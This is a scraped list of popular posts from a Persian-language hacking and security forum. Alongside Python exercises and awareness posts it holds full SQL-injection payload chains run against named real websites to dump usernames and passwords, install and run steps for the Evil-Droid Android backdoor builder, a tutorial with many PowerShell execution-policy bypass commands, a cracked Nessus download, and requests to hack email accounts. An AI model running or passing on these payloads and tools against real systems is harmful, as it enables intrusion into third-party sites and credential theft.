discord icon
سرور دیسکورد گاردایران

پرچمداران

  1. Mr.Python

    Mr.Python

    مدير بخش


    • امتیاز

      19

    • تعداد ارسال ها

      512


  2. MR.MSA

    MR.MSA

    عضو تیم دیفیس


    • امتیاز

      12

    • تعداد ارسال ها

      471


  3. Nightmare

    Nightmare

    کاربر تازه وارد


    • امتیاز

      9

    • تعداد ارسال ها

      25


  4. pro_lion

    pro_lion

    کاربر تازه وارد


    • امتیاز

      8

    • تعداد ارسال ها

      15



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در چهارشنبه, 11 فروردین 1400 در همه بخش ها

  1. 3 امتیاز
    با سلام و عرض ادب دوست عزیز تاپیک برای سایت ۹۸ هست! احتمالا ایشون تا الان مشکلشون حل شده و اینکه قرار دادن لینک درست نیست! لطفا قوانین رو مطالعه کنید. موفق باشید.
  2. 2 امتیاز
    -------------------------------------------
  3. 2 امتیاز
    مگه اینجا گیت هابه که سورس کد بدن خدمتتون ؟ برید یکم در مورد کتابخونه Shutil تحقیق کنید خب بدون تحقیق و یاد گرفتن به جایی نمیرسید که بفرمایید چندتا لینکی که پایین گذاشتم میتونه تو این راه کمکتون کنه : Link 1 Link 2 لینک دو نیازمند قن**دشکن هست سوالی بود درخدمتم
  4. 2 امتیاز
    مگه اومدی بقالی عزیز من برو پایتون رو یاد بگیر، با کتابخونه ای هم که گفتی آشنایی پیدا کن. هر بار به چیز می خوای قرار نیست ما وسایل خرابکاری ها رو به اسم آموزش برای امثال شما بدیم تا بد ازش استفاده بشه. با توجه به چیز هایی که تا الان پرسیدید، کاملا شفاف دارید میگید من یه تارگت ایرانی دارم و می خواهم با روش های مختلف بهش آسیب برسونم. یاد گرفتن پایتون برای من یه هفته و چندروز طول کشید. تازه من وقت آزاد برای این کار کم داشتم. شما شروع کن، بهت قول میدم یه هفته هم طول نمی کشه. اصلا هر جا هم مشکل داشتی به خودم بگو کمکت کنم. خواهشاً دیگه از اینجور سوالات نپرسید. **برنامه نویسی کارگری نیست** **رئسای فضای مجازی هکر ها هستند، به شرطی که جنبش رو داشته باشن و به جا از مهارتشون استفاده کنن** موفق باشی.
  5. 1 امتیاز
    mmj-sys

    روتر یا وای فای

    کر نکنم همچین باگ ضایعی داشته باشه ولی جدیدا فرم ور های مبین نت رو دستکاری کرده بودن و وقتی شما به پنل ادمین وصل می شدی شروع میکرد بد افزار به استخراج سی پی یو شما
  6. 1 امتیاز
    سلام اولا که اون قسمت ترکیه رو.... (Yalan söylemek iyi bir şey değil) دوما ارور شما مربروط به دسترسی روت میشه. یعنی به Zanti دسترسی روت ندادید. احتمالا از SuperSU یا KingRoot استفاده کردید، داخل هردوشون قسمتی هست که به اپلیکیشن ها دسترسی روت میده. هردو نرم افزاری که گفتم اگر اپلیکیشنی رو مضر بدونن بدون اجازه گرفتن از یوزر(که شخص شما باشه) دسترسیش رو قطع می کنن و باید برید تو خود نرم افزار و دستی بهشون دسترسی بدید(Zanti برای هردو نرم افزار مضر شاسایی میشه)، و از اونجایی که در ترکیه اقامت می کنید حتما زبان ترکی استانبولی هم بلدید، پس تنظیمش کنید روی زبان ترکی استانبولی و مثل زبان مادری بخونیدشون، توضیح اضافه لازم نداره! سوما با زانتی کار خاصی هم نمی تونید بکنید. احتمالا یه سرچ ساده کرده و زانتی رو پیدا کردید، در حالی که اگر از شبکه چیزی ندونید، یقینا نمی دونید اصلا چطور کار می کنه و ممکنه به مشکلات بیشتری بر بخورید. و از اونجایی هم که علاقه ای به علوم هکینگ ندارید و فقط قصدتون گیر انداختن افراد ناشناسه، تو تنظیمات مودم اول زبان رو ترکی استانبولی کنید! بعد برید آی پی فرد رو بردارید و به این وب سایت مراجعه و درخواست شناسایی فرد رو بدید تا پلیس جرایم رایانه ای ترکیه! پیداش کنه. یا اینکه پسورد رو عوض کنید و یه چیز سخت تر بجاش بزارید. عزیز من مگه مجبوری بگی تو ترکیه زندگی می کنم. مثلا اینو نمی گفتی از مطالب اصلی سوالت چیزی کم میشد مگه. چی بگم به کسی بر نخوره آخه... موفق باشید.
  7. 1 امتیاز
    اول رمز هش رو توضیح میدیم: هش یک عمیلیات یک طرفه ریاضی با الگوریتم های متفاوت هست که شما وقتی یک متن رو بهش میدین اون رو به صورت طولانی در نهایت به یک خروجی تبدیل میکنه مثل زیر: اگر password به صورت الگوریتم MD5 باشه میشه 5f4dcc3b5aa765d61d8327deb882cf99 حالا اگر این رو دوباره بخوایم به password تبدیل کنیم نیاز داریم که بدونیم با چه الگوریتمی ساخته شده و باید تلاش کنیم که اون رو بشکنیم. ______________________________________________________________________________________________________________________________________________________________________ خب حالا بریم سراغ توضیح حملات دیکشنری: دو سه تا از دوستان میپرسن که حمله دیکشنری مگه همون بروت فورس نیست؟ بله دوستان این دو تقریبا شبیه هم هستن ولی تفاوت حمله بروت فورس این هست که شما با استفاده از یک الگوریتم خاص اینکارو انجام میدین ولی توی حملات دیکشنری فقط حدس میزنید و در نتیجه شانس کمتری نسبت به حملات بروت فورس داره. حالا ممکنه این سوال براتون پیش بیاد که چرا باید از حمله دیکشنری استفاده کنیم؟ چون خیلی از مردم سهل انگاری میکنن و رمز عبور هارو برای اینکه به راحتی به ذهن بسپرن طوری انتخاب میکنن که بیشتر مردم از اون استفاده کردند از همچین رمز هایی خیلی از مردم استفاده میکنن حتی خود شما! حملات بروت فورس: حمله بروت فورس به شکل زیر هست: عددی: مثلا از اعداد یک تا 9 حروف کوچک حروف بزرگ حروف الفبای مخلوط: هم حروف کوچک و هم حروف بزرگ حروف کوچک و بزرگ به علاوه اعداد یک تا نه رنج های سفارشی هر گزینه مقدار متفاوتی از ترکیبات رمزعبور رو ممکنه ارائه بده. طبق گفته های بالا ما میتونیم با ترکیب اونها 697 میلیارد ترکیب برای این هدف داشته باشیم. حمله ترکیبی: حمله ترکیبی ترکیبی از حمله بروت فورس و دیکشنری هستش. به این معنی هست که مثل حمله دیکشنری یه لیست کلمه عبور رو بهش ارائه میدید و هر رمز عبور احتمالی در اون مثل بروت فورس اعمال میکنه. ____________________________________________________________________________________________________________________________________________ یک مثال هم براتون از تمام موارد بالا بزنم فرض کنید که یک کد برای شرکت در یک کلاس دارید و به دوستاتون هم اون کد داده شده مثلا وقتی به کد خودتون و دوستتون نگاه میکنین میبینین که توی کدی که به اون ها داده شده اسم، نام خانوادگی و یه کد دانشجویی توش وجود داره. فرض میکنیم همه کد های دانشجویی همچین چیزی هستن ( 92 94 23) شما اگر یه نگاهی کد های دوستانتون بندازید میبینید که تمام کد ها توی یه همچین رنجی هست یعنی عدد (23) که نوشته شده توی رنج 20 تا 29 هست و اعداد 94 و 92 توی رنج 90 تا 99 هست حالا شما با یک حمله دیکشنری خوب میتونید رمز دوستانتون رو پیدا کنید ولی همونطور که گفته شد شما روی یک کیس خاص عملیات انجام نمیدید و حالا هرکی رو شانستون زد پیدا میکنین ولی اگر حمله بروت فورس انجام بدید میتونید روی یک کیس خاص عملیات انجام بدید و رمز اون رو پیدا کنید. در واقع به شکل زیر هست: (نام)+(نام خانوادگی)+(کد مورد نظر)= رمز ورود خب دوستان فعلا کافیه اگر آموزش ادامه داشت همینجا میزاریمش. خدانگهدار🌹
  8. 1 امتیاز
    سلامی دوباره به تمام اعضای عزیز گارد ایران❤ خب دوستان توی این تاپیک می خوام به شما تکنیک های کرک کردن پسوورد رو مفصل به شما آموزش بدم. خب بریم که شروع کنیم: کرک کردن پسوورد میتونه هم برای اهداف خوب استفاده بشه و هم برای اهداف شرورانه ( حالا انتخاب با شماست!) یک مثال خیلی ساده : مثلا فرض کنید که رمز عبور لپ تاپ و یا حساب ایمیل و... رو فراموش کردین روش های زیادی برای بازیابی حساب شما وجود داره و کرک یکی از این روش ها هست و میتونین با این روش میتونین رمز حساب خودتون رو دوباره به دست بیارین یعنی در واقع شما با الگوریتم های مختلف رمز عبور رو حدس میزنید و اون رو کشف میکنید. این یک مثال خوبش بود ولی برای اهداف شرورانه مثلا میرید و پسوورد حساب یه بنده خدایی رو کرک میکنین و رمزش رو کشف میکنین بعد حالا هرجور صلاح میدونید حالشو میگیرید😂 بریم سراغ اصل مطلب: ( متد های کرک کردن پسوورد) انواع مختلفی از روش های شکستن رمز عبور وجود دارد ولی ما با این متد ها کار میکنیم: حملات دیکشنری حملات Brute force حملات ترکیبی (Hybrid Attacks) و چند مورد دیگر رو مثل رمز هش رو توضیح میدیم و تکنیک ها رو باهم کار میکنیم. انشالله آموزش رو از فردا شروع میکنیم. پس فعلا🙏 یا حق🌹
  9. 1 امتیاز
    Zubeid

    معرفی ابزار Evil-Droid

    بسم الله الرحمن الرحیم سلام معذرت میخوام که این پست اسپم هست ولی ابزار خیلی خوبی هست امروز میخوام یک ابزار واسه ساختن بکدور اندروید معرفی کنم پیش نیاز ها و وابستگی های این ابزار 1 - metasploit-framework 2 - xterm 3 - Zenity 4 - Aapt 5 - Apktool 6 - Zipalign وقتی مطمان شدید که تمام این ها نصب هستند میتونید کامل از این ابزار بهرهمند شوید (متاسپلویت هم خودش کافی هست) خب لینک github رو واستون میزارم تا ازش بهرمند شوید https://github.com/M4sc3r4n0/Evil-Droid خب اینم لینک دانلودش برای نصب کامل دستورات زیر را به ترتیب وارد کنید ------------------- sudo apt update sudo apt upgrade git clone https://github.com/M4sc3r4n0/Evil-Droid ----------------------------- خب برای اجرای این ابزار وارد فولدرش بشید و بقیه دستورات رو وارد کنید ---------------------------- cd Evil-Droid chmod +x * ./evil-droid '---------------''---------- ابزار شروع به کار کردن میکنه و شما با نوشتن عدد 3 میتونید فایل apk(backdoor) رو درست کنید نصب کاملا گرافیکی هست و فقط شما نوع پیلود و اسم و جای نصبش رو مشخص میکنیم و خودکار وارد متاسپلویت میشه و منتظر نصب شدن بکدور هست وقتی بکدور نصب شد خودکار دسترسی meterpreter میگیرید. --------------------------- آموزش ویدیویی در یوتیوب https://m.youtube.com/watch?v=6YdSTzBK8N4 -------------------------- سربلند و پیروز باشید.
  10. 1 امتیاز
    عرض ادب / قبل از شروع برای کرک و ست کردن پلاگین ها بر روی Nessus به تاپیک زیر مراجعه کنید: https://guardiran.org/topic/9374-%D8%A7%D8%A8%D8%B2%D8%A7%D8%B1%D9%87%D8%A7%DB%8C-%D8%A7%D9%85%D9%86%DB%8C%D8%AA%DB%8C-%D8%A8%D9%87-%D9%87%D9%85%D8%B1%D8%A7%D9%87-%DA%A9%D8%B1%DA%A9-%D9%88-%D9%84%D8%A7%DB%8C%D8%B3%D9%86%D8%B3/ اسکنر Nessus در نسخه های پایین تر از 8.10.1 از طریق یک روش کرک میشه و شما بصورت نامحدود میتونید ازش استفاده کنید که در تاپیک نام برده راجع بهش توضیحات لازم رو ارایه دادم میتونید مراجعه کنید به تاپیک بالا و استفاده کنید. پکیج پلاگین های اسکنر Nessus به همراه نسخه 8.10.1 رو در پایین ضمیمه میکنم / تاریح و نسخه پکیج پلاگین ها : 202007022200 هرگونه فایلی نیاز به پسورد داشت : guardiran.org نسخه مخصوص ویندوز: Nessus-8_10.1-x64.msi.rar نسخه مخصوص لینوکس: Nessus-8_10.1-debian6_amd64.rar پکیج پلاگین ها : all-2.0.tar.gz
  11. 1 امتیاز
    ویدئو سیزدهم آدرس تارگت : https://nicolasbouillot.net/projects.php?id=35 دستورات : https://nicolasbouillot.net/projects.php?id=35' ****************************************************************************************************************** https://nicolasbouillot.net/projects.php?id=35 order by 11-- ****************************************************************************************************************** https://nicolasbouillot.net/projects.php?id=35 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11-- ****************************************************************************************************************** https://nicolasbouillot.net/projects.php?id=-35 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11-- ****************************************************************************************************************** https://nicolasbouillot.net/projects.php?id=-35 /*!50000union*/ select 1,2,3,4,5,6,(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a),8,9,10,11-- ****************************************************************************************************************** https://nicolasbouillot.net/projects.php?id=-35%27%20/*!50000union* /%20select%201,2,3,4,group_concat(user,0x3a,pass),6,7,8,9,10,11+from+login--+ با قرار دادن ' هر تغییری که دیدین احتمال به وجود باگ هستش حالا یا ممکنه تغییر در عکس یا ظاهر سایت باشه مثل این Error Erreur lors de la préparation et exécution de la requête Untitled.mp4
  12. 1 امتیاز
    ویدئو یازدهم . : Commands Site : http://greenlandfoundation.org/ 1 : http://greenlandfoundation.org/news/more.php?id=14+order+by+7-- 2 : http://greenlandfoundation.org/news/more.php?id=-14+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()-- 3 : http://greenlandfoundation.org/news/more.php?id=-14+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=%27account%27-- 4 : http://greenlandfoundation.org/news/more.php?id=-14+union+select+1,group_concat(username,0x3a,password,%27%3CBr%3E%27),3,4,5,6,7+from+account--
  13. 1 امتیاز
    با سلام خدمت دوستان عزیز گاردایران . ویدئو هشتم یک تارگت جدید رو براتون اماده کردم که نکته جالبی داشت (به علاوه صدا) تارگت مورد برسی : 2link.co.il موفق و پیروز باشید .
  14. 1 امتیاز
    جواب تمرین 4 : import re def moshtaq(k): reg = r'\-*[a-zA-Z1-9]*\d*x\^*\-*\d*[a-zA-Z1-9]*' all = re.compile(reg).findall(k) dv = '' for p in all: if '^' not in p: for i in re.compile(r'(\-*[a-zA-Z1-9]*\d*)x').findall(p): if i == '':dv+='1' elif i == '-':dv+='-1' else: if '-' not in i: dv+='+'+i else: dv+=i else: zarayeb = ''.join(re.compile('(.*)x\^\-*\d*(.*)').findall(p)[0]) zarib = 1 zarib_q = '' z_q = '' for jj in re.compile(r'\d+').findall(zarayeb): zarib *= int(jj) zarayeb = zarayeb.replace(jj, '') while zarayeb != '': if zarayeb[0] == '-': zarib *= -1 else: zarib_q += zarayeb[0] zarayeb = zarayeb[1:] while zarib_q != '': c = zarib_q.count(zarib_q[0]) if c > 1: z_q+= zarib_q[0]+'^'+str(c) zarib_q = zarib_q.replace(zarib_q[0], '') else: z_q+=zarib_q[0] zarib_q = zarib_q.replace(zarib_q[0], '') reg_2 = r'x\^(\-*\d*)' gg = re.compile(reg_2).findall(p) zarib *= int(gg[0]) if '-' not in str(zarib)+z_q: dv += '+'+ str(zarib)+z_q+'x^'+str(int(gg[0]) - 1) else: dv += str(zarib)+z_q+'x^'+str(int(gg[0]) - 1) print(dv) moshtaq('-y5x^-4c4yb-2x^5+4x+7+40x-8+2') moshtaq('-200x^4c4yb-2x^5+4x-5x-5+7+40x^-1-8+2') moshtaq('-ab') moshtaq('ab') moshtaq('1') moshtaq('-x') moshtaq('+x') moshtaq('ax+b') moshtaq('ax^2+bx+c') moshtaq('ax^1') moshtaq('222x') moshtaq('10-40x+30')
  15. 1 امتیاز
    سلام.. در اکثر پیام رسان ها به جای استفاده از textarea از div با اتریبیوت contenteditable استفاده میشه. نمونه کد: <style> #textarea { min-height: 20px; max-height: 100px; overflow-x: hidden; overflow-y: auto; font-size: 15px; white-space: pre-wrap; word-wrap: break-word; border: 1px solid #000; } </style> <div id='textarea' contenteditable='true'></div> توضیح کد: یک div با اتریبیوت contenteditable مساوی با true را ایجاد شده. در قسمت استایل ها مقدار min-height برابر با ارتفاع هر خط می باشد. مقدار max-height برابر با min-height ضربدر تعداد خطوطی که میخواهیم به اندازه اون بزرگ بشه و بعد اسکرول بخوره. overflow-x باید برابر با hidden باشه که به صورت افقی اسکرول نخوره. overflow-y باید auto باشه که وقتی ارتفاع بزرگ تر max-height شد اسکرول بخوره. و مقدار word-wrap را مساوی break-word قرار دادیم چون باعث میشه که ادامه متن به خط بعد بره.
  16. 1 امتیاز
    tarac

    چالش مومو

    بله حق با شماست
  17. 1 امتیاز
    Mr.Python

    چالش مومو

    متاسفانه تو کشور ما مردم ناآگاه زیاد شده ولی خیلی تعجب میکنم که چرا دنبال این نیستن چیزی یاد بگیرن.. من امروز خیلی از پیامارو تو سطح نت میدیدم و واثعا متاسف شدم از این سطح اگاهی و توهمی که اکثر مردم دچارش شدن.. کسی صرفا با تلفن زدن به کسی دیگه ، هک نمیکنه چیزیو .. از طریق sniff ، شنود شبکه ، بریک کردن پروتکل ها ، شناسایی اسیب پذیری تو سطح شبکه میتونیم اطلاعات مردمو بدزدیم ، رایج ترینش که البته کار تکنیکی ای هم هست استفاده از پروتکل ss7 مخابراته .. چیزی که شما عملا هر کاری که با سیم کارتتون انجام میشه از طریق اون میشه اطلاعات رو ضبط و مشاهده کرد.. که کار اسونی نیست و تجهیزات و روابط خودشو میطلبه.. و به شکل عادی نمیشه با زنگ زدن به یکی هکش کرد! این وسط یه چیزی هست به اسم مهندسی اجتماعی ، چیزی که مرتبا داره اسیب میزنه به کاربران سطح اینترنت.. میان کاربرو گول میزنن (به هزاران هزار روش مختلف) که ازشون اطلاعات کسب کنن ، نقاط ضعفشونو بفهمن ، در نهایت از تمام این اطلاعات سو استفاده کنن و شخص رو تهدید کنن.. اون کسی که میاد به اسم مومو یا هرچیز دیگه ای با شما ارتباط برقرار میکنه ، یه ادم مریض و باهوشه! میدونه چجوری از نقطه ضعف مردم استفاده کنه... خب اگه منو شما بدونیم که نباید هر چیزیو در اختیار مردم بذاریم ، نباید با هر کسی اختلاط کنیم ، نباید شماره تلفنمونو در اختیار کسی قرار بدیم ، حواسون به نرم افزار هایی که نصب میکنیم باشه ، رو گوشی انتی ویروس خوب و اپدیت شده نصب کنیم ، اونوقت این بساطا هم خیلی زود جمع میشه.. من خودم خبر هایی شنیدم از اینکه نوجوون 12 ساله اگه اشتباه نکنم بخاطر این مسئله خودکشی کرده.. اشکال کار کجاست ؟ من نه روانشناسم نه سخنران نه از همه بیشتر میفهمم.. ولی خیلی واضحه و روشنه که باید همه مردم چه کوچیک چه بزرگ دنبال اگاهی باشن .. سطح سوادشونو ببرن بالا.. اگه کوچیکن بزرگترا کمکشون کنن ، اگه بزرگن که عقلشون میرسه.. مشکلات روحی روانی خودشونو بشناسن برن سراغ درمانش.. افسردگی الان شده جزو الزامات زندگی مردم تقصیر خودشونه وقتی تلگرامو باز میکنی و انبوهی از پیام ها با این مضون که : ( ای وای فلان شماره با پیش شماره فلان زنگ زد اگه بهشون زنگ بزنید هک میشید اینا هکرای ماهرین که میکشنتون و ........ تو همه جا این پیامو پخش کنید تا مردم اگاه بشن!) چی بگم اگه این دوستان بجای اینکه بشینن دو تا مطلب بخونن و یچیزی یاد بگیرن دیگه خودشون میتونن از خودشون دفاع کنن میتونن نادید بگیرن و به زندگیشون برسن میتونن برنامه های گوشی رو جوری کنترل کنن که بچه 10 11 سالشون به هر چیزی دسترسی نداشته باشه. ولی ، من خودمو میگم ،نمیگم مردم که به کسی برنخوره، از سر بیکاری و نااکاهی و بعضا (کمبود) میام از اینجوری پیاما رد و بدل میکنم و میذارم این موضوع همینجوری کش پیدا کنه و اون دوست هکرمون هم به ریش منو شما بخنده....
  18. 1 امتیاز
    سلام، من یک لینک از سایت mega دارم، در این لینک بهترین کتاب های هک و امنیت با پایتون ورژن ۲ و ۳، که حجم تمامی این کتاب ها تقریباً ۲ گیگابایت است وجود دارد. شما می تواند این کتاب ها را همزمان با هم دانلود کنید یا اینکه هر کتابی که نیاز دارید را دانلود کنید، زبان این کتاب ها هم انگلیسی هست، گفتم شاید کمکی به شما بکند و علم شما را زیاد کند. لینک: https://mega.nz/folder/utEVjARY#fFcYEi6PFiwKsrG3OHcAoA
  19. 1 امتیاز
    tarac

    کمک

    اگه میشه فایل رو داخل این جا اپبود کنید ممنون و اموزشش رو
  20. 1 امتیاز
    tarac

    کمک

    سلامی دوباره برنامه ای می خوام که بشه تکی به یک ایپی مودم اتک زدن من خودم مورد حمله قرار گرفتم که دوستم بود برای اینکه ثابت کنه مخابرات راحت اتک میخوره ومن می خواستم بدونم اون برنامه چیه ولی از زبون خودش اون برنامه یا کد نیست اون با یه سایت اون اتکو زد
  21. 1 امتیاز
    MR.MSA

    کمک

    برای ویندوز از hammer استفاده نکنید . ابزار های ویندوزی در قسمت dos و ddos هست . موفق و پیروز باشید .
  22. 1 امتیاز
    tarac

    کمک

    برایه این موضوع باید فقط با لینوکس باشی با ویندوز نمیشه
  23. 1 امتیاز
    حل : (تمرینات 2 و 3 خیلی اسونن ، به عهده خودتون - اگر مشکلی بود مطرح کنید) table = {'?l':'abc', '?d':'123'} string = '?d ?d?d ?l?d some string hello?ghk?d?d and ?l' gen_str = '' def generate(gen_str, string): mylist = list() if len(string) == 0:return mylist else: if string[0] == '?': if string[0] + string[1] in table: if len(gen_str) != 0 and gen_str.isspace()==False:mylist.append(gen_str.strip());gen_str='' mylist.append(table[string[0] + string[1]]) mylist+=generate(gen_str, string[2:]) else: gen_str+=string[0]; mylist+=generate(gen_str, string[1:]) else:gen_str+=string[0]; mylist+=generate(gen_str, string[1:]) return mylist print(generate(gen_str, string)) این برنامه رو با چند تا الگوریتم دیگه هم میشه نوشت ، اینجا من از الگوریتمی استفاده کردم که نیاز به حلقه های for و while نباشه ، همچنین از کلیدواژه ها ومتد های کمتری استفاده شده... یعنی خبری از yield و string partition نیست
  24. 1 امتیاز
    حل : string = input('') def StrToInt(string): sum = 0 n = len(string) - 1 for s in string: sum+=numbers_ords[s] * 10 ** n if n==0:break n -= 1 return sum m = '' numbers = [] numbers_ords = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9} for i in string: if i in numbers_ords: m+=i else: if m!='': numbers.append(StrToInt(m)) m = '' if m != '': numbers.append(StrToInt(m)) max_number = numbers[0] for i in numbers: if i > max_number: max_number = i print(max_number)
  25. 1 امتیاز
    تمرین 1 - برنامه ای بنویسید که از کاربر ، یک رشته دریافت کند و بزرگترین عدد داخل رشته را در خروجی نمایش دهد. نکته : (استفاده از توابع داخلی یعنی توابعی که در خود پایتون موجود هست - توابع built in مثل int - و استفاده از ماژول هایی مثل re - استفاده از دیگر متد های رشته مانند isdigit - isalpha - join و .... ، در برنامه جایز نیست )
  26. 1 امتیاز
    سلام بهترین روش جهت هک ایمیل های این سایت چیه ؟ http://www.rrr.com تشکر
  27. 1 امتیاز
    چند روزه دارم روش کارم میکنم . دیوار آتش اینستاگرام جلوی ورود رو میگیره
  28. 1 امتیاز
    الان تو این ۱۳ دقه پست منو دیدی ، رفتی دانلود و نصب کردی ، اموزش هارو دنبال کردی ، یاد گرفتی کامل ، سوال و جواب هارو تست کردی ، رفتی امتحانش کردی ، دیدی اینستا بلاکت میکنه ، اومدی یه پست دیگه جواب دادی ، بعدش اینو اینجا نوشتی ؟؟؟؟؟؟؟؟؟؟؟ ماشاللا با این سرعت عمل خوبه گوگل از دستت در امانه
  29. 1 امتیاز
    این ابزار هم همون کار انجام میده . مشکل اینجاست که اینستا ورود یوزر رو غیرفعال میکنه چون مشکوک میشه
  30. 1 امتیاز
    و اما روش سومِ تشخیص این نوع حمله که از طریق بررسی لاگ هست: 3-بررسی لاگ ها برای چک کردن حملات دیداس *اگر به سرور دسترسی ندارید آنرا از طریق پنل ادمین خود برای کاربران مسدود کنید و بصورت لوکال متصل شوید تا بتوانید از این روش استفاده کنید* برای اینکار به لاگ فایل های سرور مراجعه کنید که محل هرکدام از آن ها بسته به نوع وب سرور شما متفاوت است و با جستجو کردن آن را پیدا میکنید. بعد از پیدا کردن آن آی پی هاییی که بیشترین درخواست را فرستاده اند مسدود کنید. برای جستجو لاگ فایل ها میتوانید از دستور زیر استفاده کنید: locate access.log و در آخر روش هایی که برای جلوگیری از این حملات نیاز است تا انجام دهید: .استفاده از فایروال مناسب .کنترل داعم سرور .مانیتورینگ سرور برای چک کردن حملات .استفاده از کلود فلر(cloud flare) .بررسی لاگ ها به صورت دوره ای
  31. 1 امتیاز
    خیلی ممنون بابت اموزش!❤️
  32. 1 امتیاز
    بررسی policy ها در powershell و روش های دور زدن آنها همون طور که می دونید در powershell به جهت جلوگیری از اجرا شدن اسکریپت های خطرناک و جلوگیری از دسترسی های راه دور و … مایکروسافت یک سری محدودیت ها و policy ها تعریف کرده که می توان توسط کاربر تنظیم شود . این محدودیت ها در سطوح محتلف کاربری اعمال می شود. جهت تعریف این policy ها می توانیم از فرمان Set-ExecutionPolicy در powershell استفاده کنیم . با استفاده از این فرمان می توانیم تعیین کنیم که آیا کاربران در گروه های کاربری مختلف حق اجرای اسکریپت را دارند یا خیر ؟ این فرمان دارای چند نوع مجوز است. Restricted : که اجازه اجرای اسکریپت را به طور کل به هیچ کاربری نمی دهد AllSigned : تنها اسکریپت هایی که دارای امضای یک ناشر مورد اعتماد شرکت مایکروسافت قابل اجرا است. RemoteSigned : تنها اسکریپت هایی که دارای امضای دیجیتالی قابل اعتماد در سطح اینترنت است قابل اجرا است. Unrestricted : تمامی اسکریپت ها قابل اجرا می باشد فقط قبل از اجرای یگ اسکریپت در سطح اینترنت از شما سوال پرسیده می شود . Bypass : همه ی اسکریپت ها قابل اجرا می باشد و هیچ سوالی هم پرسیده نمی شود Undefined : جهت حذف سیاست های امنیتی بالا مورد استفاده قرار می گیرد شما می توانید با استفاده از فرمان زیر سیاست های بالا را اعمال کنید. Set-ExecutionPolicy Restricted که باعث جلوگیری از اجرای اسکریپت توسط کار بر می شود Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Restricted همچنین می توان بر روی یک دامنه ی زیر این محدودیت ها را اعمال کرد. MachinePolicyUserPolicyProcess CurrentUser LocalMachine در نهایت جهت دیدن لیستی از سیاست های امنیتی بر روی دامنه ها را با استفاده از فرمان زیر مشاهده کنید . PS C:\Users\Administrator> Get-ExecutionPolicy -List | Format-Table -AutoSize Scope ExecutionPolicy --------------- ----- MachinePolicy Undefined UserPolicy Undefined Process Undefined CurrentUser Unrestricted LocalMachine Unrestricted خوب حالا ما با استفاده از فرمان بالا اجرای اسکریپت را در سطح حساب کاربریمان می بندیم و سپس به شما نشان می دهیم که چگونه می توان آن محدودیت ها را دور زد . و اسکریپت خود را اجرا نمود . اول از همه یک فرمان ۲ خطی می نویسیم و آن را با پسوند PS1 ذخیره می کنیم به عنوان مثال فرمان Write-Host “BYPASSED” calc.exe حال اگر بخواهیم در حالت عادی آن را اجزا کنیم با خطای زیر مواجه می شویم. PS C:\test> .\a.PS1 .\a.PS1 : File C:\test\a.PS1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + .\a.PS1 + ~~~~~~~ + CategoryInfo : SecurityError: (:) [], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess روش های زیر جهت دور زدن سیاست های امنیتی در پاورشل ویندوز است. PS C:\test> Get-Content .\a.PS1 | PowerShell.exe -noprofile - BYPASSED PS C:\test> و PS C:\test> get-content .\a.PS1 | powershell.exe - bypassed PS C:\test> و همچنین نقطه مقابل دستور get-content در CDM که دستور Type می باشد. PS C:\test> TYPE .\a.ps1 | PowerShell.exe -noprofile - bypassed PS C:\test> همپنین می توان با استفاده از فرمان invoke-expression و pipline به گونه ای دیگر دستور را فراخوانی کرد. PS C:\test> Get-Content .\a.PS1 | Invoke-Expression bypassed PS C:\test> TYPE .\a.ps1 | Invoke-Expression bypassed می توان از کلمه ی اختصاصی فرامین نیز استفاده کرد Get-content = GC Invoke-expression = IEX PS C:\test> GC .\a.PS1 | iex bypassed می توان به خود فرمان ExecutionPolicy گفت که این یک فایل را در نظر نگیر PS C:\test> PowerShell.exe -ExecutionPolicy Bypass -File .\a.PS1 bypassed و یا خیر بگوییم سطح دسترسی را برای این فایل تغییر بده PowerShell.exe -ExecutionPolicy UnRestricted -File .\a.ps1 bypassed همچنین می توان با فراخوانی توابع بدون استفاده از تابع AuthorizationManager نیز این کار را انجام داد برای اینکار می توانید داخل profile های powershell یک تابع با نام دلخواه انتخاب کنید که من این جا نام آنرا d-exe می زاریم function D-Exe {> ($ ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,").setvalue($ctx, (new- object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell")) } و سپس می توان فایل را اجرا کنید . PS C:\test>D-exe .\a.PS1 bypassed همچنین می توان با تغییر در رجیستری این کار را انجام داد HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShellExecutionPolicy و می توانید مقدار ExecutionPolicy را به مقدار Unrestricted را تغییر داد .و در نهایت فایل را مستقیم به صورت معمولی انجام داد . PS C:\test>.\a.PS1 bypassed همچنین می توانید از طریق CMD هم سویچ کنید به powershell و اسکریپت داخل آن را اجرا کنید کافیست یک فایل Bat ایجاد کنید و در آن کد زیر را کپی نمایید . @echo off REM: Bypass.bat REM: cmd /C a.bat a.ps1 powershell.exe -noprofile -Command "powershell.exe -noprofile -encodedCommand ([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((gc %1 |%%{$_}|out- string))))" و سپس در cmd فرمان زیر را وارد کنید. a.bat a.ps1 و می بینید که کد اجرا می شود . یعنی در اصل ما توانستیم با استفاده از فرامین مختلف policy مربوط به powershell که توسط فرمان Set-executionpolicy انجام می شود را دوز بزنیم و فایل و یا اسکریپت خود را اجرا کنیم . امیدوارم مفید بوده باشد .
  33. 1 امتیاز
    گفتم اول از هر چیز باید به یک زبان برنامه نویسی مسلط باشید . مثلا PHP یا Python یا Perl شما اول بگید کدوم زبان رو کار کردید و بلدید تا من به شما مقاله بدم . اگه برنامه نویسی بلد نیستید که باید حتما یاد بگیرید .
  34. 1 امتیاز
